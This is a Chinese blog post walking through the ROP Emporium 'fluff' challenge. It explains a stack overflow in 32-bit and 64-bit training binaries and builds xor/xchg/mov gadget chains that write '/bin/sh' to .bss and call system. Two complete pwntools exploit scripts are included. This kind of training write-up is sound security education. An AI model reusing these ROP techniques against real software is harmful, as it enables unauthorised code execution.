<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>ROP Emporium の fluff | 欲辨已忘言</title><meta name="description" content="Introduction&amp;emsp;&amp;emsp;ROP Emporium训练5：fluff的解析。   fluff32Step 1&amp;emsp;&amp;emsp;程序正常运行截图： &amp;emsp;&amp;emsp;checksec： Step 2&amp;emsp;&amp;emsp;依然是pwnme中fgets函数存在溢出： &amp;emsp;&amp;emsp;虽然程序中有system函数，但是没有可利用的字符串： &amp;emsp;&amp;emsp"><meta name="keywords" content="技术 | 安全 | 渗透 | 极客"><meta name="author" content="路边的野花"><meta name="copyright" content="路边的野花"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://yoursite.com/2020/06/10/fluff/"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta property="og:type" content="article"><meta property="og:title" content="ROP Emporium の fluff"><meta property="og:url" content="http://yoursite.com/2020/06/10/fluff/"><meta property="og:site_name" content="欲辨已忘言"><meta property="og:description" content="Introduction&amp;emsp;&amp;emsp;ROP Emporium训练5：fluff的解析。   fluff32Step 1&amp;emsp;&amp;emsp;程序正常运行截图： &amp;emsp;&amp;emsp;checksec： Step 2&amp;emsp;&amp;emsp;依然是pwnme中fgets函数存在溢出： &amp;emsp;&amp;emsp;虽然程序中有system函数，但是没有可利用的字符串： &amp;emsp;&amp;emsp"><meta property="og:image" content="http://cdn.ghealer.top/2.jpg"><meta property="article:published_time" content="2020-06-10T01:35:57.000Z"><meta property="article:modified_time" content="2020-08-07T09:45:09.553Z"><meta name="twitter:card" content="summary"><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#000')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#fff')
  }
}

var getCookies = function (name) {
  const value = `; ${document.cookie}`
  const parts = value.split(`; ${name}=`)
  if (parts.length === 2) return parts.pop().split(';').shift()
}

var autoChangeMode = 'false'
var t = getCookies('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (Cookies.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web&amp;display=swap"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: false,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: false    
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2020-08-07 17:45:09'
}</script><noscript><style>
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 5.0.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" data-lazy-src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">3</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">3</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">4</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fluff32"><span class="toc-number">2.</span> <span class="toc-text">fluff32</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Step-1"><span class="toc-number">2.1.</span> <span class="toc-text">Step 1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Step-2"><span class="toc-number">2.2.</span> <span class="toc-text">Step 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Step-3"><span class="toc-number">2.3.</span> <span class="toc-text">Step 3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Step-4"><span class="toc-number">2.4.</span> <span class="toc-text">Step 4</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fluff"><span class="toc-number">3.</span> <span class="toc-text">fluff</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(http://cdn.ghealer.top/2.jpg)"><nav id="nav"><span class="pull-left" id="blog_name"><a class="blog_title" id="site-name" href="/">欲辨已忘言</a></span><span class="pull-right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">ROP Emporium の fluff</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-06-10T01:35:57.000Z" title="发表于 2020-06-10 09:35:57">2020-06-10</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2020-08-07T09:45:09.553Z" title="更新于 2020-08-07 17:45:09">2020-08-07</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/WriteUPs/">WriteUPs</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/WriteUPs/ROP-Emporium/">ROP Emporium</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>&emsp;&emsp;<a target="_blank" rel="noopener" href="https://ropemporium.com/">ROP Emporium</a>训练5：fluff的解析。</p>
<a id="more"></a>

<h2 id="fluff32"><a href="#fluff32" class="headerlink" title="fluff32"></a>fluff32</h2><h3 id="Step-1"><a href="#Step-1" class="headerlink" title="Step 1"></a>Step 1</h3><p>&emsp;&emsp;程序正常运行截图：</p>
<p>&emsp;&emsp;checksec：</p>
<h3 id="Step-2"><a href="#Step-2" class="headerlink" title="Step 2"></a>Step 2</h3><p>&emsp;&emsp;依然是pwnme中fgets函数存在溢出：</p>
<p>&emsp;&emsp;虽然程序中有system函数，但是没有可利用的字符串：</p>
<p>&emsp;&emsp;所以需要向内存中写入需要的字符串，再找一下可以实现目标的指令段：</p>
<p>&emsp;&emsp;也没有可以利用的指令段，似乎陷入死局？</p>
<h3 id="Step-3"><a href="#Step-3" class="headerlink" title="Step 3"></a>Step 3</h3><p>&emsp;&emsp;其实还是有一条路可以走的，在<a target="_blank" rel="noopener" href="https://coldwave96.github.io/2020/05/20/XMAN-level3/">XMAN level3 の Write-Up</a>中我们通过泄露writes函数在got表上的地址得到libc的基地址，然后通过libc中的字符串getshell。这里我们依然可以使用ret2libc技术，泄露puts函数在got表上的地址，获取libc的基地址，然后用这个基地址加上’/bin/sh’在libc中的offset，调用system函数getshell。</p>
<p>&emsp;&emsp;但是根据题目的叙述，似乎是在让我们尝试强行写入需要的字符串，那我们只能回到程序，再仔细的找找可用的gadget了。</p>
<p>&emsp;&emsp;不妨逆向思维倒推一下，我们需要写内存的操作，那么肯定要mov [reg]，reg；ret的结构：</p>
<p>&emsp;&emsp;这个函数是可以实现，首先考虑控制写入的地址，那么往前推我们需要控制ecx寄存器，给ecx赋值：</p>
<p>&emsp;&emsp;xchg指令是交换两个寄存器的值，那么从上面的函数中截取部分是可以实现给ecx赋值的，但是我们就要改为控制edx寄存器：</p>
<p>&emsp;&emsp;* 这段指令会将edx和ebx异或的值放入edx。所以我们需要pop edx；xor ebx，ebx；或者pop ebx；xor edx，edx；（A异或0仍为A）</p>
<p>&emsp;&emsp;所以还需要pop ebx；ret：</p>
<p>&emsp;&emsp;完美，前半部分控制内存地址的ropchain已经补充完成。下面是控制字符串的写入，也是从sub_8048692函数开始，倒推需要控制edx。</p>
<p>&emsp;&emsp;依然没有直接pop edx的指令，只能选择间接的xor edx，ebx；</p>
<p>&emsp;&emsp;和上面一样需要pop edx；xor ebx，ebx；或者pop ebx；xor edx，edx；</p>
<p>&emsp;&emsp;于是回到上面的sub_8048670函数，最后依然是pop ebx；ret；</p>
<p>&emsp;&emsp;最终实现控制写入的字符串，下面做一个草图帮助一下理解以及EXP的编写：</p>
<h3 id="Step-4"><a href="#Step-4" class="headerlink" title="Step 4"></a>Step 4</h3><p>&emsp;&emsp;最后就是EXP的编写：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">* <span class="keyword">from</span> pwn <span class="keyword">import</span> *;</span><br><span class="line">* </span><br><span class="line">* sh = process(<span class="string">&#x27;./fluff32&#x27;</span>)</span><br><span class="line">* elf = ELF(<span class="string">&#x27;./fluff32&#x27;</span>)</span><br><span class="line">* </span><br><span class="line">* pop_ebx_addr = <span class="number">0x080483e1</span></span><br><span class="line">* xor_edx_edx_addr = <span class="number">0x08048671</span></span><br><span class="line">* xor_edx_ebx_addr = <span class="number">0x0804867b</span></span><br><span class="line">* xchg_addr = <span class="number">0x08048689</span></span><br><span class="line">* mov_addr = <span class="number">0x08048693</span></span><br><span class="line">* </span><br><span class="line">* bss_addr = <span class="number">0x0804a040</span></span><br><span class="line">* sys_addr = elf.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">* </span><br><span class="line">* <span class="function"><span class="keyword">def</span> <span class="title">mov_data</span>(<span class="params">string, addr</span>):</span></span><br><span class="line">*     payload = p32(pop_ebx_addr) + p32(addr)</span><br><span class="line">*     payload += p32(xor_edx_edx_addr) + p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line">*     payload += p32(xor_edx_ebx_addr) + p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line">*     payload += p32(xchg_addr) + p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line">*     payload += p32(pop_ebx_addr) + string</span><br><span class="line">*     payload += p32(xor_edx_edx_addr) + p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line">*     payload += p32(xor_edx_ebx_addr) + p32(<span class="number">0xdeadbeef</span>)</span><br><span class="line">*     payload += p32(mov_addr) + p32(<span class="number">0xdeadbeef</span>) + p32(<span class="number">0</span>)</span><br><span class="line">*     <span class="keyword">return</span> payload</span><br><span class="line">* </span><br><span class="line">* payload = <span class="string">&#x27;a&#x27;</span> * (<span class="number">0x28</span> + <span class="number">0x4</span>)</span><br><span class="line">* payload += mov_data(<span class="string">&#x27;/bin&#x27;</span>, bss_addr)</span><br><span class="line">* payload += mov_data(<span class="string">&#x27;/sh\x00&#x27;</span>, bss_addr + <span class="number">4</span>)</span><br><span class="line">* payload += p32(sys_addr) + p32(<span class="number">0xdeadbeef</span>) + p32(bss_addr)</span><br><span class="line">* </span><br><span class="line">* sh.recvuntil(<span class="string">&#x27;&gt;&#x27;</span>)</span><br><span class="line">* sh.sendline(payload)</span><br><span class="line">* </span><br><span class="line">* sh.interactive()</span><br><span class="line">* sh.close()</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;EXP运行结果：</p>
<h2 id="fluff"><a href="#fluff" class="headerlink" title="fluff"></a>fluff</h2><p>&emsp;&emsp;像32位程序一样寻找完整的ROP Chain：</p>
<p>&emsp;&emsp;加上控制r12寄存器的指令段：</p>
<p>&emsp;&emsp;以及调用system函数传参的时候需要控制rdi寄存器：</p>
<p>&emsp;&emsp;万事俱备，直接给出EXP脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">* <span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">* </span><br><span class="line">* sh = process(<span class="string">&#x27;./fluff&#x27;</span>)</span><br><span class="line">* elf = ELF(<span class="string">&#x27;./fluff&#x27;</span>)</span><br><span class="line">* </span><br><span class="line">* bss_addr = <span class="number">0x601060</span></span><br><span class="line">* sys_addr = elf.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">* </span><br><span class="line">* mov_addr = <span class="number">0x40084e</span></span><br><span class="line">* xchg_addr = <span class="number">0x400840</span></span><br><span class="line">* xor_r11_r12_addr = <span class="number">0x40082f</span></span><br><span class="line">* xor_r11_r11_addr = <span class="number">0x400822</span></span><br><span class="line">* pop_addr = <span class="number">0x4008bc</span></span><br><span class="line">* </span><br><span class="line">* pop_rdi_addr = <span class="number">0x4008c3</span></span><br><span class="line">* </span><br><span class="line">* payload = <span class="string">&#x27;a&#x27;</span> * (<span class="number">0x20</span> + <span class="number">0x8</span>)</span><br><span class="line">* payload += p64(pop_addr) + p64(bss_addr) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(xor_r11_r11_addr) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(xor_r11_r12_addr) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(xchg_addr) + p64(<span class="number">0</span>)</span><br><span class="line">* </span><br><span class="line">* payload += p64(pop_addr) + <span class="string">&#x27;/bin/sh\x00&#x27;</span> + p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(xor_r11_r11_addr) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(xor_r11_r12_addr) + p64(<span class="number">0</span>)</span><br><span class="line">* payload += p64(mov_addr) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">* </span><br><span class="line">* payload += p64(pop_rdi_addr) + p64(bss_addr)</span><br><span class="line">* </span><br><span class="line">* payload += p64(sys_addr)</span><br><span class="line">* </span><br><span class="line">* sh.recvuntil(<span class="string">&#x27;&gt;&#x27;</span>)</span><br><span class="line">* sh.sendline(payload)</span><br><span class="line">* </span><br><span class="line">* sh.interactive()</span><br><span class="line">* sh.close()</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;EXP运行结果：</p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">路边的野花</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/06/10/fluff/">http://yoursite.com/2020/06/10/fluff/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://yoursite.com" target="_blank">欲辨已忘言</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="http://cdn.ghealer.top/2.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2020/08/05/hello-world/"><img class="prev-cover" data-lazy-src="http://cdn.ghealer.top/2.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Hello World</div></div></a></div><div class="next-post pull-right"><a href="/2020/05/01/AssembleCommand/"><img class="next-cover" data-lazy-src="http://cdn.ghealer.top/2.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">汇编指令长度</div></div></a></div></nav></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 By 路边的野花</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="font_plus" type="button" title="放大字体"><i class="fas fa-plus"></i></button><button id="font_minus" type="button" title="缩小字体"><i class="fas fa-minus"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module" defer></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js" async></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>